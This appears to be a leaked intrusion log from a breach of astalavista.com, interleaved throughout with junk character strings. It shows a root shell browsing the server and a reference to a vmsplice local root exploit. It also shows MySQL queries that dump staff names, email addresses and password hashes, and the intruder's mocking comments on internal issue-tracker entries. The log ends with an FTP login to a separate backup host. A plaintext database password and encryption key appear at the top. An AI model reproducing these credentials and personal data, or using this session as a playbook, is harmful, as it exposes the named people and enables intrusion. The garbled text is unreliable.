$conxPassword = ‘cXvB3981′; // MySQL password: o& P* m$ a" {# Q" C& t# i
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: z+ K2 \. L, j& A
?>
# Z3 T. n) t3 Z6 R6 [
% ?. W9 M) I3 o9 c8 Rsh-3.2# cd ..
{7 n `6 `" Z+ k0 S7 j S* E# \( Hsh-3.2# cd com
+ r/ i# A j, l9 A. ]sh-3.2# ls -la; Q. l: z2 _# N/ L) `) k' r3 a& G
total 1412081 _0 y+ R4 ^+ ^* f$ i2 D
drwx–x–x 10 com com 4096 Apr 28 12:40 .0 B9 P2 f- \1 O# |7 N6 U/ b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 }3 X+ Z- H0 g- i; P
drwx—— 2 com com 4096 Jun 4 04:04 backups. y- @4 T' R+ q
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql' P5 @" z, Z+ ~2 `$ Q9 n2 B
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system6 E. k$ x( W+ g; J1 N
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
$ e9 k5 ?) p7 m- {3 e0 C2 h-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout* o& @7 H* J- W! p6 u9 r
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
; H: @- \% a! t+ D- B" a4 b1 l% o-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc: L6 p- P' C- X
drwx–x–x 3 com com 4096 Jan 29 2008 domains& B4 O2 Y2 m1 l% h7 e& H( F
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
- a2 r! Y0 c) p, z5 f- ndrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
9 h) q7 J" T5 k' {: ?-rw——- 1 com com 69 Nov 18 2008 .lesshst' N: [" ~" P4 m, F# l' U. q. ~; B+ E
drwx—— 2 com com 4096 Sep 24 2007 mail
6 f3 E- z5 G6 P7 d& ]! Y% f# E& W1 R-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
& O; w- `9 e) v: F4 r/ s5 Q6 zdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
2 j! C) r" {! ~lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html* m( T! r1 j5 a+ @/ z
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
: u+ P6 R. J- u* P; K8 G, w# Udrwx—— 2 com com 4096 Aug 26 2008 .ssh
0 W9 Z3 V0 a# y, U+ v, r& P-rwx—— 1 com com 8515 Feb 10 2008 t/ j+ C+ V5 @! Y9 R
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
- K, X/ o% x1 rdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
1 _6 V$ K [, b- T7 ?# Z3 D-rw-rw-r– 1 com com 617 May 20 2008 .toprc
# z5 Y; } X; E8 I-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql- g+ f! d0 T5 b9 O, d
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
7 y; J- h7 A( ^( Q1 Y2 V* M7 t4 j-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
0 _- G9 S3 C2 p3 i7 l$ E
3 n Z1 R4 l1 Q7 K) Q0 g+ Osh-3.2# head t.c
/ w1 U1 u/ o* e/ G/*
$ f2 Z# a. l3 t5 w* jessica_biel_naked_in_my_bed.c
M9 z* w- U8 U, x# A1 o- a) l9 i; R*2 x/ d3 T! j/ S7 u1 |" y5 x
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
" |1 ^9 V* n) b0 G9 S- r2 m* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
% ~) ] i- f0 v; O5 D* g% ]$ d4 n* Stejnak je to stare jak cyp a aj jakesyk rozbite.5 L: B( u' Z" M
*5 d! b3 @1 d( i
* Linux vmsplice Local Root Exploit
: F2 a# |2 ~3 K; U+ N* By qaaz7 R" g P: k6 ]; H
*- D8 Y, W/ A, B) _: d0 J1 ^, O
; e9 X& J. ]( msh-3.2# cd /
7 {' V8 g7 p5 K1 E# _# E" u" N+ zsh-3.2# ls -la3 p8 \) b4 c4 `3 d
total 360
* s0 A$ [, L' _9 J7 v* Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
4 h9 S& P- n/ wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 |3 E- h4 _/ C7 q9 A$ ~
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
" ^0 y% w5 F7 e& [2 j5 {' V# {-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
- E0 t3 I6 z! K8 p! R1 @-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db! w" H( h5 w: A [8 ?
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
- X1 z$ i6 ~+ B' ?-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel! \/ ?- }( w( H/ U
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup2 B$ Q' ^* M" {8 h& \6 @' T/ {
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
+ K& z* U6 W) _2 i/ m9 T( A/ pdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
- ]! K0 x2 ?3 d1 L8 `5 p8 W Tdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
" f: P- \$ G! F/ N8 L( _drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc4 n, G0 r% u4 i/ A; j
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home: g$ B, D5 r3 r+ h7 O
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf7 Z) O7 w, M" ~
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib1 F; h/ |1 I" n' Z t& c
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
, x3 T" o7 l% _: w: O9 v) Cdrwx—— 2 root root 16384 Sep 11 2007 lost+found
1 L% d' {( m: g, ]' ~9 ^drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
# {6 t4 D8 r6 Udrwxr-xr-x 2 root root 0 Jun 3 02:43 misc: q8 C: d- X. V" R2 m: P7 Y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
8 Z/ P9 {6 `: y-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg6 }! z& p! j. R+ e
drwxr-xr-x 2 root root 0 Jun 3 02:43 net) ^! h A7 Z2 V5 [; {" a d
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
8 c. b8 b! H: g& o& Tdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
G1 }5 Y* z/ T- g7 w M7 udrwxr-x— 15 root root 4096 Jun 4 08:40 root
4 N! @! r# d& s& adrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin+ L2 v I$ L \: r: W2 q+ ?- R
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux& ~2 N' R; S1 X
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
9 m, K' \, c" S1 o9 Bdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys9 E6 W) p3 k6 X% j1 e
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
4 Z, ^% Q; L& _! ]drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr9 W+ l- l9 B1 ?8 f& [) ?
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var8 a! ~) S: Z% a
+ _, @9 n# h8 esh-3.2# cd opt, z- ^7 [: F3 y P6 ~3 q4 J" a6 b
sh-3.2# ls -la
) [# W9 m2 Z; Etotal 20' U7 ~& @, ]& E E+ t2 L
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
8 F7 u" P8 L/ c0 c7 S/ T2 qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! E8 W/ v( W- x
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws" |1 K) ?! x# X4 H' u. [
) o6 g2 l( I- J" P
sh-3.2# cd lsws/: c6 f' o! a* w1 i7 {. A
sh-3.2# ls -la y& C# S0 T8 d) |1 a* ^- t
total 108
( H( h4 m' {3 Z" Y- I0 }drwxr-xr-x 15 root root 4096 Mar 20 2008 .- Y1 k! E1 P" e9 m: F
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
" G$ G( ]) n" \' Jdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons. L- c* f, B, [, Z& p* n8 g
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
! j: l v% K1 V4 B+ J3 |& R# Rdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate# m. X8 i/ ~( G! w% l" E
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
# K2 @1 T8 w& q8 q# |3 }drwx—— 4 apache apache 4096 Jun 3 02:43 conf
$ M& A8 o( n7 x8 K3 ndrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT; n6 E: _( u/ j+ e
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
" [$ s9 r% g9 O+ g& Idrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin+ x& p# l$ `. B9 m$ D2 \
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
! q" u( n* z, {- g-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
( g8 J- p8 j0 D: b) i2 g-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
& E# A; Z5 L+ W/ g, N0 X8 x% N: I-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
$ Z1 X9 J- f8 _ q' ^-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP2 F( l- U! E6 [9 k0 ]6 }" U
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
- n7 K; s1 h( f, i/ |3 Ydrwxr-xr-x 2 root root 4096 Mar 20 2008 php
& W' H5 ^& x6 A& l! fdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
# i/ ~% H9 s' P( v6 U; I" adrwxr-xr-x 3 root root 4096 Mar 20 2008 share- O$ T7 E5 u& K& Q7 _" D
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
4 h+ s% K. k2 H5 R1 L, D" p3 _/ _
/ c6 o# b' p+ O+ c% L# A% m( Ksh-3.2# cd conf
% f6 Y1 e4 y6 p6 v) I. tsh-3.2# ls -la& W) Z% ]( Y8 k5 y/ f M- ?/ r
total 488 o0 z" [% q/ @: G
drwx—— 4 apache apache 4096 Jun 3 02:43 .1 D, ^1 M' z `+ {
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
5 h9 H Z! F8 v3 }6 p' Bdrwx—— 2 apache apache 4096 Mar 20 2008 cert
6 c. \$ T) Y* e. l) M" a2 j-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
9 l- a. w5 z- t# \# T3 e-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak; N+ E3 t+ h+ v
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last. V0 l8 r$ d) x5 ^6 T/ h
-rw——- 1 apache apache 256 May 29 15:10 license.key$ T8 [& w6 m- ?: t6 |
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
2 z) H, x8 ]& I( {-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
/ K a8 N4 `/ b! N! H1 R* U-rw——- 1 apache apache 20 May 29 15:10 serial.no
; q- L5 F' E3 N+ Z, X& Jdrwx—— 2 apache apache 4096 Mar 20 2008 templates# J: W) A8 w/ E6 {- f- v
b" l4 `9 \3 K$ q9 m
sh-3.2# cat serial.no7 U3 x: i: P% `
IbDl-oVsO-CKqL-wVRa' K8 N) u5 o$ }
: t+ a; h: R6 _/ h" Q" \' z! S Jsh-3.2# mysql
- _# Y" k1 [+ n. _* LWelcome to the MySQL monitor. Commands end with ; or \g.9 a( i) j* \# X: ~
Your MySQL connection id is 286844! M; |4 [6 G; o% I6 ]" @4 m5 O' u! z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
) s" ?% c# U5 t/ K" x0 y
, {3 S' P4 _! O. tType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.% y y# {; p+ B4 r. k& L
4 ?( j) ^. t$ N# x }8 [* \
mysql> show databases;
; C2 I0 j Z( `0 x& O+ y6 b% I+———————–+6 S4 U: `5 Z2 S$ A6 v
| Database |4 G0 K1 _8 X+ c& d# `" [/ _- c
+———————–+
. G* {4 H& H" m5 k| information_schema |; K; A3 F8 S* ? E- V1 ^
| astanet_ads |2 v" d6 {$ ^# `
| astanet_mailing_lists |( i* j8 ~) q- t$ u4 G& g+ r& P' h
| astanet_mediawiki |: S& H) l7 A: b' d9 F' d
| astanet_membersystem |
; t/ Y# n6 n' N/ Q| com_contrexx |
, l1 I6 o1 }! }& z1 ]| com_contrexx2 |* x. ^" }0 T- \# N! T% ]
| com_contrexx2_live |- i3 k) l5 _+ F* | H& w
| da_roundcube |
1 R G% W7 t. l! j* t+ T| dolphin |
% U, b5 V0 M& Z. p$ c# C| ideapool |2 B1 a" {. D0 l6 I, s" i
| mysql |
7 [1 ~# E1 r$ }; R3 d1 |. B| test |
1 c# l) @3 H1 {| yourmaster |
# i( G) k: U. A3 }7 l6 y9 {+———————–+$ w0 } s i/ P( b0 F1 \
14 rows in set (0.00 sec)
( L/ D0 |* d* p8 k4 D4 d* G @' @$ Z
mysql> use ideapool/ J9 o4 y+ u" V$ h/ h! H$ n* {" J
Database changed t8 H9 z9 e# Z0 q* W
mysql> show tables;
& X& d5 N( m- \# d3 f9 a+———————————–+/ x2 y! n; n7 I r7 k# Z" C
| Tables_in_ideapool |
/ q# q9 \, b- v$ k; U, f- M+———————————–+
$ B+ c! h0 l5 c# G; G| eventum_columns_to_display |, B0 q& }" {1 d6 E
| eventum_custom_field |- K4 V; n$ v! n. r- f
| eventum_custom_field_option |
; z$ u" B$ d7 e* h& e| eventum_custom_filter |
$ }! M* \* ~7 \$ U| eventum_customer_account_manager |! N. I. N' U! e
| eventum_customer_note |
7 D6 [7 u3 j8 f2 S3 i1 R- F' X' m| eventum_email_account |6 Q6 m- ?7 E/ o, t p. K3 A
| eventum_email_draft |& a T8 i$ |3 ?( _- b" m* M8 o
| eventum_email_draft_recipient |
3 A1 Y% X, m8 L/ M| eventum_email_response |8 s: e" }: Z, j2 Z5 T3 W4 P6 D
| eventum_faq |" s& Y- V# r5 p1 N2 |+ q1 T
| eventum_faq_support_level |
, P2 j: o# p& @ @, ] t| eventum_group |, x2 L+ ~$ B' r+ g5 O( T! T
| eventum_history_type |
* E4 n6 N" v1 o2 r) b! k| eventum_irc_notice |
+ i: v! ?7 F( G1 D| eventum_issue |
- I! f b3 z, g1 K5 `2 ~+ m/ X6 Q7 U| eventum_issue_association |1 |3 r4 m* G9 \7 |4 S
| eventum_issue_attachment |
7 v* x% D8 ?4 |9 S7 P3 l i' r| eventum_issue_attachment_file |. X. p0 D' _ b! P8 t9 O
| eventum_issue_checkin |. ^( p! \2 B3 y6 U) F
| eventum_issue_custom_field |8 r. P# N2 C. w9 c- n
| eventum_issue_history |$ ]2 [9 l8 v2 n8 E6 ]1 H/ A) h
| eventum_issue_quarantine |
/ ~) ~8 X' `6 B- p; O- l| eventum_issue_requirement |
( h% ~ s0 ^' f6 i| eventum_issue_user |" t9 t+ ~+ j8 D5 o
| eventum_issue_user_replier |& B. q* H1 B' A9 u1 V
| eventum_link_filter |
2 K$ K( T$ N2 m" d| eventum_mail_queue |
, y/ }' {4 R! J! S& T0 i| eventum_mail_queue_log |
; R: e( n7 G7 U3 H; }4 o| eventum_news |3 U1 k! Y- B6 g. T7 l7 s4 A! z3 p
| eventum_note |
" H* w! l9 V0 @/ Q4 w| eventum_phone_support |& d- y8 r$ ~9 w7 g5 r* `2 D. F
| eventum_project |
- T: e9 ^% D6 Q| eventum_project_category |
1 B6 X) B7 V& f" X$ U| eventum_project_custom_field |
2 ?5 L3 d+ a$ R0 k( S% K| eventum_project_email_response | D7 |/ }3 Q" x# K6 i
| eventum_project_field_display |
: s) O! ~( ?/ u( ?/ B| eventum_project_group | J- K. m) K7 n
| eventum_project_link_filter |& F0 o* z3 \' `$ l' W- @
| eventum_project_news |
g# k: e) c- n( u6 v+ M% `- I| eventum_project_phone_category |
+ ~( Z1 K# l/ h# e# ^| eventum_project_priority |
/ }! G7 @. q: s* ~ N7 O| eventum_project_release |3 Q' m0 Z! M0 Z# |7 g. `% E; {2 z
| eventum_project_round_robin |2 Y/ L1 o8 [9 @& s; Q' L P' N
| eventum_project_status | J$ `8 q4 j0 X
| eventum_project_status_date |
( R( T7 J. y9 C# z| eventum_project_user |
, W3 W, m% c# J) v* z| eventum_reminder_action |
' l( o2 u. Z- R7 z$ n| eventum_reminder_action_list |# u) P4 h$ H! X, u0 h" y, c' z
| eventum_reminder_action_type |
- \* z3 d2 ?* P9 O- a( Q| eventum_reminder_field |
3 ?% n0 b/ l" c V! a5 P. l* C% S1 G| eventum_reminder_history |% b+ ?( h# e6 A8 n
| eventum_reminder_level |
2 U" k9 t0 t$ y* X! o( s' D2 R| eventum_reminder_level_condition |2 U# O* P7 n6 X9 W- l
| eventum_reminder_operator |1 E5 J6 E$ F* |$ ]; _
| eventum_reminder_priority |# U2 {, m/ w: d8 ?
| eventum_reminder_requirement |
: f3 f# x3 R- S9 b| eventum_reminder_triggered_action |' l- H! j- D" m; o; u4 a1 h' i
| eventum_resolution |
E3 ~9 L9 T% y| eventum_round_robin_user |# ~" M: {; X# g& Q3 ]* J
| eventum_search_profile |
* f1 S' H& a6 o| eventum_status |9 {3 E/ e5 B; z& s0 T
| eventum_subscription |
' X$ |* P6 S' d' X| eventum_subscription_type |0 H% v3 n' i: F* z+ p$ o
| eventum_support_email |
9 ]3 I; n) Z- Q* i3 V| eventum_support_email_body |6 b: L+ K4 z- a4 e9 r
| eventum_time_tracking |
8 D# K1 J! b, G/ s. M| eventum_time_tracking_category |. o2 E1 u- p; r- V& m4 z
| eventum_user |1 e" j. m7 U! w9 N% X+ W
+———————————–+
1 [9 G9 ^7 v' r' V69 rows in set (0.00 sec)
8 ^1 V% d% P. m9 W. m$ i. \
; n! r, G( O' i! G, O$ F2 pmysql> describe eventum_user;; r+ h' |; H3 ?9 q
+————————-+——————+——+—–+———————+—————-+- M4 O- U$ R1 q$ x
| Field | Type | Null | Key | Default | Extra |
8 g" y* H, G! v) x* C+————————-+——————+——+—–+———————+—————-+- F6 U' o5 p% Y6 F3 b
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |+ w; C& i, w3 j0 d8 d
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |' x6 ?7 L& Z. X. ~) x0 H1 W
| usr_customer_id | int(11) unsigned | YES | | NULL | |
+ h" V5 x- k8 I" E7 z/ y| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
* x2 G! O0 J5 E5 m! y" T| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
: y' X, o- M0 U+ F| usr_status | varchar(8) | NO | | active | |. V$ l/ n( H: B
| usr_password | varchar(32) | NO | | | |
w% S# n5 A! G| usr_full_name | varchar(255) | NO | | | |/ x) H! ?) U9 w; }# b
| usr_email | varchar(255) | NO | UNI | | |
/ W5 F- z M6 ]" M4 G4 D+ P| usr_preferences | longtext | YES | | NULL | |8 u. R% A9 {# i
| usr_sms_email | varchar(255) | YES | | NULL | |
6 b5 H/ o5 v8 u, H" s| usr_clocked_in | tinyint(1) | YES | | 0 | | h! X- M! {+ F# Y2 f4 u# n
| usr_lang | varchar(5) | YES | | NULL | |( R. k9 D. C. m K
+————————-+——————+——+—–+———————+—————-+
3 w7 v0 v* K. [, P13 rows in set (0.00 sec)' N' T5 ^' o- Y, r
H. @+ G3 y( ~9 `% Emysql> select usr_full_name,usr_email,usr_password from eventum_user;: H" B; g/ F2 Z$ t
+———————-+——————————-+———————————-+3 i% ^6 ?* a7 `7 I6 Q
| usr_full_name | usr_email | usr_password |( H/ `; \" D& x- I2 N
+———————-+——————————-+———————————-++ K% R! U4 j/ f p1 i
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |' {6 N: L2 `& J- ]3 d
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |( t; j* k7 N( I5 t# B8 k2 R
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
/ o7 s3 [- f3 I| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
0 j) L4 F+ a$ a9 h2 c% l| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
! t* k! Z; ?0 u| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |6 O/ i7 c( f: i2 E' z+ E. v6 Q. {+ ^
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |; Y- M' B' L3 u3 x- ^6 f
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
' F7 s. R+ N$ t| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
9 A/ P6 C: ^" d% Q8 S- S1 j| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
8 `+ o& o3 `3 ?8 \| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |2 p4 H" k. z7 c# k
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |& X: |: [- t" q( G% @
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
, Q& z4 O6 R5 s* S+ d| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |- s4 m' w: D1 ?7 L" e. p4 X
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |1 f. h- F5 |! Y* ^# R n3 N
+———————-+——————————-+———————————-+3 r9 Z. o! T' h4 D
15 rows in set (0.00 sec)% {9 Y) \: L1 H' Q1 R; K# {
5 W$ e2 I! h) u
mysql> select iss_description from eventum_issue where iss_id = 43;
! P- H# g8 N. d& a, K( n& j& X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+& Z/ f% x# j2 s, v
| iss_description 7 R$ B+ i: J% w' T: \: t& \
|
( h1 K, D. u. @( P9 s7 ?+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+7 }0 o" _4 f. t& O
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be# c5 }5 r; j7 g4 Y n3 V; P
connected for 90 mins… 120mins… so what i propose is something like:
9 h/ p7 l" v% P6 S链接标记[url]http://www.surfthechannel.com/[/url]$ T. N0 ]- y2 k0 o2 Z
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system: g) _" e: C+ z6 {1 s
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
. @% I$ t3 S2 n2 i. p0 `- @break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
2 o% o1 p4 j$ o+ ^ ]" @if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…. ]3 ?$ n) q, p8 ?$ u8 s2 l
) b- d# e0 Y; b& e9 m. FWe could also put advertisement during play on the flash video player itself… extra $$…
0 K! g9 j/ u, l- C$ B0 }
( m# ?# j3 A" [( U" I, M- Y; OBy sykadul |
5 n* q0 p" a* _$ _ ~3 I; A$ p# ~+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
( T- m9 x5 @1 N1 row in set (0.00 sec)$ ?/ K8 C+ E% F' r
* t1 j! e0 T* K; b; O- e! U' _
// Money and extra $$ is all they care about. remember that.
2 p* b, d+ y9 ~% F" ^
3 B& U$ U! t1 ]& r+ emysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
1 a4 B) `) q, u# u+————————+——————————————————————————————————————————————————————————————————————————————-+
5 m1 y0 _7 ]' S, { Y| iss_summary | iss_description
/ Y" L* w3 B+ @|! \2 H/ j, f" ]' t
+————————+——————————————————————————————————————————————————————————————————————————————-+
3 f6 ], p( k; N6 m; m$ E6 c ^( || Forum for REAL EXPERTS | Hello,
$ q- B9 F* [% b" Z7 p/ j
5 w3 S" v) G/ O3 ^Ishtus and I,
% E7 A2 Z. r, u) S$ ]* K) ]
( ?6 A* R) k5 a& m- Q$ T0 l5 \2 r8 D9 YCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
. U7 @: y' m0 n$ s+ v7 C4 h! z3 ^ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc.., W V7 t1 F; i, j: H6 B1 Q
8 Z3 N- C/ j6 X# w5 ]9 N/ W
One example a friend of mine from coresecurity.com!/ H/ {' a# e3 d" ~' R( d
: [- T n7 ~: X `; z- O
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 M% |) B3 K f4 @2 U) C/ a
; l3 f1 S7 W; @% y# R|* B& l. E$ O5 ?3 \' g
+————————+——————————————————————————————————————————————————————————————————————————————+
+ G" V8 a9 W5 U; S' E0 q% F4 A1 row in set (0.00 sec)
1 x" {. |/ ]/ w9 t* L, W2 N) T# a% @" j/ u: |, |6 A }
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs… q. C! I; _, E6 n( A7 v
6 b6 H! J: F) b1 P3 |8 `0 r7 E* v
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;* Z% G* a7 A: n7 Y
+——————+———————————————————————————————+! \' r- b2 D( X' Y$ k
| iss_summary | iss_description |
1 i: j$ g# D! b) @ b; ]+——————+———————————————————————————————+
5 f+ i5 v' s, k. F5 t; N8 z% B| Website guidance | Virtual Girl which guides you trought the website." m# ]! E5 D3 \. Y7 W9 z# a
0 _4 q& [) G1 u2 D( d* ~- WWe need a girl with who you can ( talk )!!!
0 y' H' V0 u, d9 P9 L/ zAlso for the News!
. @1 C- f- f6 R0 HSo my suggestion is a girl who read you the news loud if you like!
# ~ }: L* J/ A; syou can choose between read yourselfe or she read it for you or both!2 k% _: k/ y3 | k9 ~) \% ^9 W
* P7 O. Q- F- S! g2 l; z
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!: \$ a1 [% Y B6 a
$ N% \: I0 p% Z& sHave a look on the example girls!!2 O5 G; K6 N9 J) Z2 s' U
/ Q4 c" E7 V; h7 W8 b* V' R$ E链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]( C+ X- d+ ^9 I! ~1 [8 s
, K5 d' @8 G9 P P6 }& C# F5 Oor that: N7 I+ O+ |% i7 t
7 n; B7 A9 X5 O8 W链接标记[url]http://www.yellostrom.de/[/url]( q/ W. z2 ~# w- `: h
0 Y$ Q$ a3 A% ^: S6 b+ w2 m|
0 U! I: r3 C, d2 D; u$ A9 D! z+——————+———————————————————————————————+5 _# L g2 W8 ~$ \6 x
1 row in set (0.00 sec). E! o3 k3 v0 S8 y
2 L8 n3 H* X! |; D9 y// ha ha.
5 u5 S8 l' p! {: I5 W$ j1 Z( {, x. f9 z$ K9 }# H/ L
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
. n. v! S- e) p. _1 g+————————–+———————————————————————————————————–+
# N; }) j0 h7 y| iss_summary | iss_description |' z1 c, K: ?- L
+————————–+———————————————————————————————————–+7 W1 b5 [- }8 A! y9 ?
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |2 ~# m) J5 U) r" m+ M
+————————–+———————————————————————————————————–+
( G0 C {* S7 B+ E1 row in set (0.00 sec)
% C' z+ c: d$ {: y+ T: _2 i
$ s8 T# x$ S; d$ i// LOL.7 i9 a% K; _& L$ h5 c
u+ B% E4 {( b) f, t
mysql> exit
: a" Q+ S& j/ u; |# GBye
7 U( U" ?' e. S8 d* J0 G) [( h% U6 Y, g5 D2 B& v( [3 [
sh-3.2# ftp 212.254.194.163; S, h; O6 f4 e0 v! a) q( e3 }. H
Connected to 212.254.194.163., s5 D0 Q( {: `2 x4 w. T
220 BackupCOM_VW FTP server ready.5 U6 r0 s0 A' o3 Q
504 AUTH: security mechanism ‘GSSAPI’ not supported.4 z( N5 b5 h9 k9 J2 s0 O
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
9 |$ T( D1 W {# F7 b0 GKERBEROS_V4 rejected as an authentication type$ C \: ^6 W0 I8 ]$ x
Name (212.254.194.163:root): astalavista.com
! P# L, e; x; P6 H8 h331 Password required for astalavista.com.
9 _- D; i. \2 {0 _& w/ JPassword:
2 I0 A" U0 o8 a/ d8 U230 User astalavista.com logged in.4 ?0 C" x: F+ a" U& k9 E
Remote system type is UNIX.% G5 D* z/ \6 w5 m4 p
Using binary mode to transfer files.
7 \0 x- L5 V: J4 m9 d0 Pftp> ls -la) T! Z0 y" J2 E% i( @. c
227 Entering Passive Mode (212,254,194,163,2,188)& D; t8 r2 U2 j) q# b& k2 e* W
150 Opening BINARY mode data connection for ‘file list’.3 B5 u/ j& \3 y/ @' d+ _. `3 c
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com$ t% N1 n+ Z+ v' @
226 Transfer complete.* g6 W0 ?7 j; ~; l1 }! w7 G
ftp> cd astalavista.com
